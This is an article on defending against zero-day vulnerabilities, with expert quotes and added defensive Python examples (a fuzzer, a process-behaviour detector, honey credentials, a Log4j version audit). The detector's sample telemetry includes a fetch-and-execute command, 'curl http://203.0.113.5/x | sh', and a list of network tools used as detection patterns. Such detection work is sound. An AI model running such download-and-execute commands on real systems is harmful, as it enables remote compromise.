Zero-day vulnerabilities: How to deal with the unknown

Table of contents
  1. What is a zero-day vulnerability?
  2. Where do zero-day vulnerabilities come from?
  3. Preventive protection
  4. Proactive protection
  5. Responding to the exploitation of a zero-day vulnerability
  6. Results

The "wild nature" of the information security world is full of "predators". Some are frightening but predictable and threaten only a narrow group of organisations. Others have long been studied, and almost every organisation that takes its cybersecurity seriously is reliably protected against them.

But there is one risk that neither a security-focused tech giant nor a startup founded yesterday may be ready for: zero-day vulnerabilities.

This article looks at why 0-day vulnerabilities exist, how critical they are to a company's operations, and what methods can protect against their exploitation.

What is a zero-day vulnerability?

A zero-day vulnerability is a flaw in the software or logic of an information system that has only just been discovered and for which, at the moment the company's specialists learn of it, no ready fix or mitigation exists.

The main "weapon" of a zero-day, the thing that sets this group apart from other vulnerabilities, is surprise and confusion. When the vulnerability comes to light, the security specialists and developers protecting the infrastructure are working with very limited data: they have only the report from the researchers who discovered it and the telemetry from the security tools installed inside the infrastructure.

Evgeny Gryaznov
Leading information security consultant at R-Vision

To answer this question, first you need to settle the terminology. From a development point of view, a 0-day is no different from any other vulnerability. What is special about a 0-day is that the developer had 0 days to fix it.
This means that no protective measures have yet been created against it, and the software vendor itself learns of the vulnerability only when it begins to be actively exploited in customer systems, and in some cases much later. At the same time, from the moment the vulnerability becomes publicly known until fixes (patches) are released and installed, a considerable amount of time may pass, during which the 0-day will be actively used by attackers.
Since not every vulnerability poses a real risk, a 0-day is usually also understood as a vulnerability with a high CVSS (Common Vulnerability Scoring System) rating, in particular one that allows remote code execution. To reduce their number, companies use secure development techniques (AppSec) such as fuzzing and static and dynamic analyzers. Special attention should be paid to timely updating of third-party dependencies and components in which a 0-day may be found. A striking example is the well-known Log4j vulnerability.

The situation is further complicated by the fact that the "zero day" does not necessarily coincide with the day the vulnerability was found and first exploited by attackers. Defenders may begin "closing" a vulnerability that hackers have already been using for months.

In most cases, however, the situation is not so critical, for several reasons at once. First, most such vulnerabilities are found and fixed at the various stages of development and testing, before the service goes live.

Alexander Buravtsov
Director of Information Security at MyOffice

An effective way to reduce 0-day vulnerabilities is to use Secure Development Principles (SSDLC), which we apply in our company. This approach significantly improves the quality of our products, as all stages of development are under control, from planning to release.
At the stage of creating a product architecture, SSDLC practices allow you to avoid using vulnerable architectural patterns and solutions. At the development stage, they provide security control for code and third-party libraries using specialized automated tools and allow you to fix vulnerabilities even before they are included in the main code base. In the process of getting binary artifacts and preparing a release, dynamic analysis, fuzzing, and engaging external teams of testers help identify and eliminate what was previously missed.
As a result, by releasing a product, we can guarantee its safety. Of course, nothing completely eliminates vulnerabilities, but in our experience, the SSDLC approach significantly reduces the number of potential errors.

SSDLC and security analysis do not guarantee that no zero-day vulnerabilities remain in the infrastructure. But to find them, attackers need at least as much competence in security analysis and pentesting as those who carried out the verification and development. There are very few such hackers, and most of them belong to APT groups.

The second reason each new 0-day does not become the "end of the world" for a service is that not all of them are truly critical to the infrastructure's operation or lead directly to an unacceptable event.

The third reason is the range of detection and protection methods available, including security tools built around behaviour analysis and anomaly detection: they do not rely on information about previously known vulnerabilities, but look for the markers of exploitation of vulnerabilities that have not yet been identified.

Dmitry Pudov
CEO of NGR Softlab

The list of such tools is quite extensive, from specialized solutions to various analytical tools that can help you respond in a timely manner to attempts to exploit a 0-day or build an additional layer of protection. At the same time, it is difficult to talk about a single tool in the context of 0-day vulnerabilities; rather, it is a set of tools that can help detect and respond to an attack in a timely manner at different stages of its development. For example, behavioural analytics systems or deception technologies can be useful. An equally important aspect is the readiness of the information security team to analyse the consequences of successful attacks, in order to collect the necessary attributes of the techniques used and then prevent their use.

Zero-day vulnerabilities are a dangerous phenomenon that can have serious consequences for a company and for the users of the affected service. But it is important to understand that undetected vulnerabilities exist in absolutely every service and company. Once this fact is accepted and the company systematically prepares for the day such a vulnerability is identified, the risk drops significantly.

Where do zero-day vulnerabilities come from?

As noted above, the "zero day" is the day the software developer learns of a vulnerability. That is why the work of researchers who analyse the behaviour of hacker groups and data from hacker forums is so important: information about a new vulnerability may appear there before it surfaces in public and before it is found by "white-hat" researchers.

Alexander Novikov
Head of Research, Cyberanalytics and Development at T1 Group

When a 0-day is found by a "black-hat" hacker, they do not inform the developers about it, specialists do not know the vulnerability exists, and therefore it cannot be counted in statistics.
An attacker can write code that takes advantage of the vulnerability, an exploit. But they will not necessarily use it themselves: they can sell it on the darknet, perhaps in a private channel, which keeps the number of people who know about the 0-day to a minimum.
In addition, once a network is penetrated, an attacker can either attack immediately or lie low and wait for a more suitable moment, which can also widen the interval between the discovery of a vulnerability and awareness of it.
When a white-hat hacker finds a vulnerability, they report it to the developer, who releases a software update that closes the vulnerability, and the information about it becomes publicly available.

As for where zero-day vulnerabilities actually originate, there are two sources:
  1. Natural. During product development, a specialist made a mistake or failed to anticipate an "unintended" use of a particular piece of code. This is the human factor; its impact can be reduced through automation and by involving more competent specialists, but it cannot be reduced to zero.
  2. Artificial. Any deliberately introduced vulnerability, whether motivated by the self-interest of an individual specialist, unfair competition, or the intervention of third parties.

Alexander Gerasimov
CISO Awillix

0-day vulnerabilities can be planted from the outset by specialized structures to achieve their goals (espionage, smart data theft, etc.), or hackers may have found clever attack vectors based on both low-level and high-level features.
There is no single prescription or cure for all attacks. As a tip: set up the infrastructure so that, if necessary, you can both roll out a new update and roll back to an older version of your product that is not affected by the vulnerability; monitor vulnerability information regularly and prevent the use of obviously vulnerable versions.

Technological progress is also a factor: the resistance to hacking of resources and services that the vendor no longer supports or updates decreases year by year.

From the reasons zero-day vulnerabilities appear, three stages of dealing with them follow:
  1. Preventive. The whole set of actions to eliminate vulnerabilities before the product is released.
  2. Proactive. Checks, testing and analysis throughout the service's lifetime, in order to "get ahead" of attackers in identifying vulnerabilities.
  3. Reactive. Everything the team does to respond to and study an identified vulnerability, promptly "close" it, and release (install) the patch that fixes it.

Viktor Chashchin
Chief Operating Officer of the MULTI-FACTOR Company

It is not entirely correct to talk about reducing the number of zero-day vulnerabilities, because every error found at the very beginning is a zero-day vulnerability, so you need to write code as prescribed by the guidelines for writing secure applications, the same widely known OWASP.
In absolute numbers, of course, more identified vulnerabilities are credited to the "whites", if only because there are more of them and they are constantly searching their projects' code. The "blacks" are more likely to find atypical errors, because they often have to take a non-trivial approach to the task of penetrating the infrastructure under study.

At each stage, or level, of combating the exploitation of zero-day vulnerabilities, there are practices and recommendations that can help a company both reduce the risk of attackers finding such a vulnerability and respond effectively when one is discovered.

Preventive protection

Preventive protection begins with accepting that no product in the digital environment is secure in principle. It follows that the more services a company uses, the more potential zero-day vulnerabilities they contain, and the higher the risk.

It therefore makes sense to go through the list of IT systems with Occam's razor and drop those that duplicate each other's functions, those that do not inspire confidence because of their development team (especially important in the context of a geopolitical crisis), or those that simply perform no critical function.

Seen from the point of view of the developer of an information system or resource, the first means of dealing with zero-day vulnerabilities (and many other security problems) is the introduction of secure development practices (the SSDLC approach).

Boris Larin
Cybersecurity Expert, Kaspersky Lab

The number of 0-day vulnerabilities and their possible effect can be reduced if you develop by adhering to Secure Software Development Lifecycle (SSDLC) practices. One of the most common SSDLC models is MS SDL, developed by Microsoft.
The main stages of this model are:
  • training all employees involved in the basics of secure development;
  • identifying possible risks, threats, and methods of mitigating them at the design stage;
  • implementing code according to secure development best practices (for example, prohibiting the use of unsafe methods, static code analysis before compilation);
  • verifying the compiled software code (for example, fuzzing, conducting pentests);
  • preparing a response plan for previously unknown threats.
In addition, if the product is being developed from scratch, developers can choose more modern, memory-safe languages (for example, Rust, Go, etc.). Using such languages cannot protect against all types of vulnerabilities, but it will save them from the most common vulnerabilities that affect programming languages such as C and C++.
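Gryaznov, Buravtsov and Larin all name fuzzing as a pre-release technique, and it is worth seeing what it does in miniature. What follows is an added example, not code from the article or from any of the companies quoted in it: a constructed TLV (tag, length, value) record parser in an unchecked form, the same parser hardened with explicit bounds checks, and a small mutation fuzzer that feeds both of them random variants of a valid input. The record format, the seed input and the bug are all constructed for the demonstration; `MalformedInput`, `parse_records_unchecked`, `parse_records_hardened`, `mutate` and `fuzz` are names assumed here.

```python
"""Mutation fuzzing of a constructed TLV (tag, length, value) parser.
Added example: the format, both parsers and the fuzzer are constructed for illustration."""
import random
import struct


class MalformedInput(ValueError):
    """Raised by the hardened parser for input it deliberately rejects."""


def parse_records_unchecked(data: bytes) -> dict:
    """Records are tag (1 byte) + length (2 bytes, big-endian) + value.
    This version trusts the length field and the remaining buffer size,
    which is exactly the kind of unknown bug fuzzing is meant to surface."""
    records, i = {}, 0
    while i < len(data):
        tag = data[i]
        (length,) = struct.unpack(">H", data[i + 1:i + 3])  # struct.error if < 2 bytes remain
        value = data[i + 3:i + 3 + length]                  # silently short if length lies
        if tag == 0x01:
            records["count"] = value[0]                      # IndexError on an empty value
        else:
            records[tag] = value
        i += 3 + length
    return records


def parse_records_hardened(data: bytes) -> dict:
    """Same format, but every field is validated before use; bad input is
    rejected with MalformedInput instead of an unplanned exception."""
    records, i = {}, 0
    while i < len(data):
        if len(data) - i < 3:
            raise MalformedInput("truncated record header")
        tag = data[i]
        (length,) = struct.unpack(">H", data[i + 1:i + 3])
        if len(data) - (i + 3) < length:
            raise MalformedInput("length field exceeds buffer")
        value = data[i + 3:i + 3 + length]
        if tag == 0x01:
            if length != 1:
                raise MalformedInput("count record must be exactly one byte")
            records["count"] = value[0]
        else:
            records[tag] = value
        i += 3 + length
    return records


# Constructed valid input: {tag 1, len 1, count 5} {tag 2, len 3, "abc"}
SEED_INPUT = bytes([0x01, 0x00, 0x01, 0x05, 0x02, 0x00, 0x03]) + b"abc"


def mutate(data: bytes, rng: random.Random) -> bytes:
    """One random mutation: overwrite a byte, truncate, or insert random bytes."""
    buf = bytearray(data)
    choice = rng.randrange(3)
    if choice == 0 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif choice == 1 and buf:
        del buf[rng.randrange(len(buf)):]
    else:
        pos = rng.randrange(len(buf) + 1)
        buf[pos:pos] = bytes(rng.randrange(256) for _ in range(rng.randrange(1, 4)))
    return bytes(buf)


def fuzz(parser, iterations: int = 2000, seed: int = 1):
    """Return the first input on which parser raises anything other than
    MalformedInput (an unplanned crash), or None if it survives every input."""
    rng = random.Random(seed)
    corpus = [SEED_INPUT]
    for _ in range(iterations):
        candidate = mutate(rng.choice(corpus), rng)
        try:
            parser(candidate)
        except MalformedInput:
            continue                 # explicit rejection is the intended behaviour
        except Exception:
            return candidate         # unplanned exception on attacker-controlled bytes
        corpus.append(candidate)     # inputs that parse are kept to mutate further
    return None


if __name__ == "__main__":
    crash = fuzz(parse_records_unchecked)
    print("unchecked parser crashed on:", crash.hex() if crash else None)
    print("hardened parser crashed on:", fuzz(parse_records_hardened))
```

The point of the split is the exception policy: the hardened parser turns every malformed input into one deliberate error type, so the fuzzer can tell "rejected by design" from "crashed", and a real harness would treat only the latter as a finding. Real fuzzers (coverage-guided ones in particular) are far better at reaching deep states than this random mutator, but the workflow is the same.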

A service built from the start on the understanding that it will be attacked, and that security gaps will inevitably be found, is far better protected out of the gate than one created on a standard SDLC.

Proactive protection

The proactive fight against zero-day vulnerabilities partly overlaps with the preventive one and consists of three elements:
  • regular, multi-format testing;
  • security tools that can help identify attacks exploiting zero-day vulnerabilities;
  • writing response procedures and rehearsing them.

Kirill Romanov
Business Development Manager of the Information Security Department of Sissoft

Usually, development is divided into stages, each of which ends with a vulnerability check. Where verification was once performed manually, specialized programs such as PT Application Inspector are now responsible for the process.
When the product is ready and in "combat" use, you should think about using a "sandbox" that emulates the client's infrastructure. It checks what a received file does and whether it tries to run something bad. If so, it is added to the block list and cannot harm the infrastructure.

Multi-format testing means, first of all, regular internal and external security audits, engaging pentesters, red teaming, and running bug bounty programs.

As for cybersecurity tools that can help protect against 0-days, it is important to understand that they work adequately and effectively only on top of the baseline security tools: firewalls, antivirus, mail traffic protection, traffic analyzers, and a number of others.

Ivan Chernov
UserGate Development Manager (Information security expert):

The current cyber threat landscape is so diverse and dynamic that basic security tools alone are no longer sufficient to build a fully protected infrastructure, if only because of the existence of such a factor as the zero-day vulnerability. To "recognize it in person", you must also be hacked through it, so it is logical that, at the moment, it is impossible to shield yourself from malicious 0-day exploitation a priori; that is why it is "zero": it has just appeared and has not yet been described by anyone.
However, there are preventive methods and approaches that can be used to detect traces of compromise and attempts to exploit even a 0-day in time, reduce the attack's penetration surface and stop it. The method is based on scrupulously analysing data, finding significant events among them, identifying incidents and investigating them, so that the responsible persons (developers and information security specialists) can then correct or protect this vulnerability.
Specifically to implement such a proactive and preventive concept, UserGate has developed its own tool, the Log Analyzer security event monitoring system.
LogAn combines the functionality of SIEM (Security Information and Event Management) and IRP (Incident Response Platform), providing capabilities for collecting logs and events, searching for incidents and responding to them.
It is very important to understand that SIEM is a complex tool. Without a proper approach to the classification of knowledge, it will not give tangible benefits. However, a set of simple recommendations will allow you to start using LogAn, which also belongs to the SIEM class, and use it effectively from the very first days. We have even developed our own life hacks that turn the system from a complex one into a very convenient tool.

Applied to zero-days, the tools that show the greatest effectiveness are those focused on complex behaviour analysis, on attack chains (relationships between events), and on finding anomalies in specific elements of the infrastructure.
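As an added illustration of what such a behaviour-based rule looks like in practice (example code written for this page, not from the article or from any vendor named in it, and serving the earlier point that such tools look for markers of exploitation rather than known vulnerabilities): the detector below walks process-creation events, flags a shell whose ancestry leads back to a web-facing service (the signature-free "web server spawned a shell" behaviour that exploitation of an unknown RCE typically produces), and ties any download or network tool the shell launches within a short window to the same alert. The events, host names, process lists and the `203.0.113.5` address (from the documentation range) are constructed; `detect`, `WEB_SERVICES`, `SHELLS` and `NETWORK_TOOLS` are names assumed here, and a real deployment would take the events from an EDR or auditd rather than a list.

```python
"""Behaviour-based detection over process-creation events.
Added example with constructed telemetry; it keys on what exploitation does
(a service spawning a shell, then a network tool), not on any known CVE."""
from collections import defaultdict
from datetime import datetime, timedelta

WEB_SERVICES = {"java", "nginx", "httpd", "apache2", "node", "php-fpm", "tomcat"}
SHELLS = {"sh", "bash", "dash", "zsh", "cmd.exe", "powershell.exe"}
NETWORK_TOOLS = {"curl", "wget", "nc", "ncat", "python", "python3", "perl"}

# Constructed EDR-style process events (one host compromised, one benign)
EVENTS = [
    {"ts": "2024-03-01T10:00:00", "host": "web-01", "pid": 410, "ppid": 1,
     "image": "/usr/lib/jvm/bin/java", "cmd": "java -jar app.jar"},
    {"ts": "2024-03-01T10:05:12", "host": "web-01", "pid": 5120, "ppid": 410,
     "image": "/bin/sh", "cmd": "sh -c 'curl http://203.0.113.5/x | sh'"},
    {"ts": "2024-03-01T10:05:13", "host": "web-01", "pid": 5121, "ppid": 5120,
     "image": "/usr/bin/curl", "cmd": "curl http://203.0.113.5/x"},
    {"ts": "2024-03-01T10:05:14", "host": "web-01", "pid": 5122, "ppid": 5120,
     "image": "/bin/sh", "cmd": "sh"},
    {"ts": "2024-03-01T10:30:00", "host": "web-01", "pid": 6001, "ppid": 1,
     "image": "/usr/bin/bash", "cmd": "bash"},            # admin login shell, benign
    {"ts": "2024-03-01T11:00:00", "host": "db-01", "pid": 700, "ppid": 1,
     "image": "/usr/sbin/nginx", "cmd": "nginx"},
    {"ts": "2024-03-01T11:00:05", "host": "db-01", "pid": 701, "ppid": 700,
     "image": "/usr/sbin/nginx", "cmd": "nginx: worker"},  # worker process, benign
]


def _name(image: str) -> str:
    """Executable name from a Unix or Windows path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def _ancestors(procs: dict, pid: int, max_depth: int = 3):
    """Yield ancestor events of pid, nearest first, up to max_depth hops."""
    cur = procs.get(pid)
    for _ in range(max_depth):
        if cur is None:
            return
        cur = procs.get(cur["ppid"])
        if cur is None:
            return
        yield cur


def detect(events, window: timedelta = timedelta(minutes=5)) -> list:
    """Alert on a shell descended from a web service; severity rises to high
    if that shell launches a network/download tool within `window`."""
    procs_by_host = defaultdict(dict)
    for e in events:
        procs_by_host[e["host"]][e["pid"]] = e
    alerts = []
    for e in sorted(events, key=lambda x: x["ts"]):
        if _name(e["image"]) not in SHELLS:
            continue
        procs = procs_by_host[e["host"]]
        parent = procs.get(e["ppid"])
        if parent is not None and _name(parent["image"]) in SHELLS:
            continue  # nested shell: the outermost shell carries the alert
        origin = next((a for a in _ancestors(procs, e["pid"])
                       if _name(a["image"]) in WEB_SERVICES), None)
        if origin is None:
            continue
        t0 = datetime.fromisoformat(e["ts"])
        followups = sorted(
            c["pid"] for c in procs.values()
            if c["ppid"] == e["pid"] and _name(c["image"]) in NETWORK_TOOLS
            and timedelta(0) <= datetime.fromisoformat(c["ts"]) - t0 <= window)
        alerts.append({"host": e["host"], "origin": _name(origin["image"]),
                       "origin_pid": origin["pid"], "shell_pid": e["pid"],
                       "cmd": e["cmd"], "followups": followups,
                       "severity": "high" if followups else "medium"})
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Nothing in the rule names a CVE or a payload: it fires on the relationship between events (service, shell, network tool) and would have caught the Log4Shell-style "Java process runs `sh -c curl ... | sh`" chain the same way it catches a still-unknown bug. The cost is tuning: legitimate services that spawn shells (build agents, cron-like jobs) need an allow-list, which is why the example keeps the service, shell and tool sets as data rather than hard-coding them.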

Deception technologies are also especially effective in such cases: they aim to provoke the attacker into an unmasking action. They are not designed to detect malware or specific hacking techniques, but target ordinary human weaknesses that hackers of any skill level share.

As for procedures and rehearsing them on cyber ranges, their main benefit is dispelling the unpredictability and ambiguity that often surround zero-day vulnerabilities. Of course, one cannot script the exact actions for a specific situation of this kind, but rehearsing a universal response reduces the risk of mistakes made in haste or under stress.
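The simplest deception that exploits exactly that weakness is a honey credential: an account that no legitimate process ever uses, planted where an attacker who has just landed via an unknown exploit would look for it. The following is an added example (written for this page, not from the article or any vendor it mentions): a decoy service-account name is derived per placement with an HMAC, so the name that later appears in an authentication attempt identifies which file the attacker read, and a small scanner raises an alert on any use of it. The secret, placements, log format and log lines are constructed; `make_honeytoken`, `detect_honeytoken_use`, `HONEY_SECRET` and `PLACEMENTS` are names assumed here.

```python
"""Honey-credential (deception) detection.
Added example with constructed data: a decoy service account is derived per
placement, planted in files an attacker would read, and any attempt to use it
is a high-confidence alert that also names the decoy that was harvested."""
import hashlib
import hmac
import re

# Per-deployment secret; constructed here, in practice loaded from a secret store
HONEY_SECRET = b"constructed-deployment-secret"

# Where decoys are planted (host:path); constructed locations
PLACEMENTS = ["web-01:/etc/app/config.ini", "app-02:/srv/app/.env"]


def make_honeytoken(location: str) -> str:
    """Derive a distinct, unguessable decoy username for each placement, so the
    username that shows up in an auth attempt tells you which file was read."""
    tag = hmac.new(HONEY_SECRET, location.encode(), hashlib.sha256).hexdigest()[:12]
    return f"svc_backup_{tag}"


TOKENS = {make_honeytoken(loc): loc for loc in PLACEMENTS}

# sshd-style auth lines; the pattern is assumed for this example
_AUTH_RE = re.compile(r"(Accepted|Failed) \S+ for (?:invalid user )?(?P<user>\S+) "
                      r"from (?P<src>\S+) port (?P<port>\d+)")


def detect_honeytoken_use(log_lines, tokens=None) -> list:
    """Return one alert per authentication attempt that uses a decoy username.
    Any hit is an incident: no legitimate client ever knows these names."""
    tokens = TOKENS if tokens is None else tokens
    alerts = []
    for line in log_lines:
        m = _AUTH_RE.search(line)
        if m and m["user"] in tokens:
            alerts.append({"user": m["user"], "src": m["src"],
                           "decoy": tokens[m["user"]], "outcome": m.group(1)})
    return alerts


# Constructed auth log: a benign login, an attacker trying the decoy harvested
# from web-01's config, and a scanner guessing a common username
AUTH_LOG = [
    "Mar  1 10:02:11 db-01 sshd[2201]: Accepted publickey for deploy "
    "from 10.0.0.12 port 50210 ssh2",
    "Mar  1 10:07:01 db-01 sshd[2211]: Failed password for invalid user "
    f"{make_honeytoken('web-01:/etc/app/config.ini')} from 203.0.113.5 port 51234 ssh2",
    "Mar  1 10:07:05 db-01 sshd[2212]: Failed password for invalid user admin "
    "from 198.51.100.7 port 40022 ssh2",
]


if __name__ == "__main__":
    for alert in detect_honeytoken_use(AUTH_LOG):
        print(alert)
```

Because the decoy is never used legitimately, the rule has essentially no false positives, which is what makes deception attractive against an attacker whose entry technique is unknown: it does not matter how they got in, only that they did what people do next. The decoy should be plausible enough to be tried (a real-looking service account with a real-looking password) and should grant nothing if the attempt succeeds.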

Responding to the exploitation of a zero-day vulnerability

Within this section, three aspects are critical:
  1. Awareness. Information about a newly found 0-day will simply not reach the company if its specialists do not keep a finger on the pulse or, at the very least, read the notices from the software vendor.
  2. Patch management. The first update from the vendor may "close" the vulnerability or it may be ineffective. It may even introduce several new holes or break the entire service.
  3. Readiness. If specialists have experience from cyber exercises, clear procedures, and an adequate set of tools, it is highly likely that they will be able to minimize the potential damage.
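A concrete check for the awareness and patch-management points above, and for the third-party dependency risk Gryaznov raises with Log4j: an added example, not from the article, of a small version-aware audit that compares a component inventory against an advisory table. The inventory, hosts, the unrelated library and the `ADVISORIES` layout are constructed; the only real data is the Log4j 2 history noted in the comments, where the first fix for CVE-2021-44228 (2.15.0) was itself superseded by later releases, which is why the audit distinguishes "vulnerable" from "patched with a superseded fix" instead of treating any upgrade as done. `parse_version` and `audit` are names assumed here.

```python
"""Version-aware dependency audit against an advisory table.
Added example; the inventory and the advisory layout are constructed (see comments)."""
import re

_VERSION_RE = re.compile(r"^(\d+(?:\.\d+)*)(?:[-.]?([a-z]+)(\d*))?$")


def parse_version(v: str) -> tuple:
    """Map '2.0-beta9' -> ((2,0,0), 0, 'beta', 9) and '2.14.1' -> ((2,14,1), 1, '', 0)
    so that tuple comparison orders versions and a pre-release sorts before its final."""
    m = _VERSION_RE.match(v.strip().lower())
    if not m:
        raise ValueError(f"unparseable version: {v!r}")
    nums = tuple(int(x) for x in m.group(1).split("."))
    nums += (0,) * max(0, 3 - len(nums))         # 2.0 == 2.0.0
    if m.group(2):
        return (nums, 0, m.group(2), int(m.group(3) or 0))
    return (nums, 1, "", 0)


# Advisory table with a constructed layout. The Log4j entry reflects public history:
# CVE-2021-44228 affected log4j-core from 2.0-beta9; 2.15.0 was the first fix and was
# itself superseded by 2.16.0, 2.17.0 and 2.17.1, which this example takes as the
# minimum acceptable version (later releases exist and also pass the check).
ADVISORIES = {
    "org.apache.logging.log4j:log4j-core": {
        "id": "CVE-2021-44228",
        "affected_from": "2.0-beta9",
        "superseded_fixes": ["2.15.0", "2.16.0", "2.17.0"],
        "min_fixed": "2.17.1",
    },
}

# Constructed SBOM-style inventory
INVENTORY = [
    {"host": "app-01", "component": "org.apache.logging.log4j:log4j-core", "version": "2.14.1"},
    {"host": "app-02", "component": "org.apache.logging.log4j:log4j-core", "version": "2.15.0"},
    {"host": "app-03", "component": "org.apache.logging.log4j:log4j-core", "version": "2.17.1"},
    {"host": "app-01", "component": "com.example:unrelated-lib", "version": "1.4.2"},
]


def audit(inventory, advisories) -> list:
    """Return a finding for every inventory item inside an advisory's affected
    range, distinguishing a superseded (incomplete) fix from no fix at all."""
    findings = []
    for item in inventory:
        adv = advisories.get(item["component"])
        if adv is None:
            continue
        ver = parse_version(item["version"])
        if ver < parse_version(adv["affected_from"]) or ver >= parse_version(adv["min_fixed"]):
            continue
        superseded = {parse_version(s) for s in adv["superseded_fixes"]}
        findings.append({
            "host": item["host"], "component": item["component"],
            "version": item["version"], "advisory": adv["id"],
            "status": "superseded fix" if ver in superseded else "vulnerable",
            "required": adv["min_fixed"],
        })
    return findings


if __name__ == "__main__":
    for finding in audit(INVENTORY, ADVISORIES):
        print(finding)
```

Two details matter in practice. First, the `min_fixed` value has to be re-read from the vendor advisory each time it is revised, which is the "awareness" point: a check written on the day the first patch shipped would have reported app-02 as clean. Second, a single affected range is a simplification; vendors sometimes ship fixes on backport branches for older runtimes (Log4j did, for older Java versions), and those need their own entries rather than being marked vulnerable by a range check.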

Evgeny Kravtsov
Senior Frontend Developer, SberDevices

0-day vulnerability protection tools can include:
- Network monitoring: tools that detect unexpected activity or anomalies that may indicate an attempt to exploit a 0-day vulnerability.
- Code injection protection: tools that prevent the introduction of unwanted code, such as protection against spam injections and buffer exploitation attacks.
- Data protection: Tools that protect data from unauthorized access or modification, such as data encryption.
- Antivirus programs: tools that detect and block malware that can be used to exploit 0-day vulnerabilities.

It is also worth remembering that exploiting a zero-day vulnerability, with a number of exceptions, does not by itself bring about an unacceptable event. In most cases, SOC specialists have time to minimize the damage from the attack. That said, a scenario involving the exploitation of a high-criticality vulnerability is always possible, as happened with Log4Shell.

Results

Zero-day vulnerabilities are not a deus ex machina or a new phenomenon in cybersecurity. They have always existed; they have acquired their "scary" reputation because services are constantly improving, and so is the cybersecurity expertise of companies. As a result, hackers have to be especially resourceful and look for especially non-trivial ways into the infrastructure.

At the same time, the arsenal for dealing with such "black swans" is also growing, supplemented not only by new software solutions but also by the experience specialists gain in earlier incidents, which reduces the element of chance in how the SOC responds to an incident involving a zero-day vulnerability.

Finally, the only reliable way to deal with such vulnerabilities is to accept that a system or service is vulnerable for exactly as long as it operates, which means that security monitoring, by every available means, must be an integral part of the company's information security policy.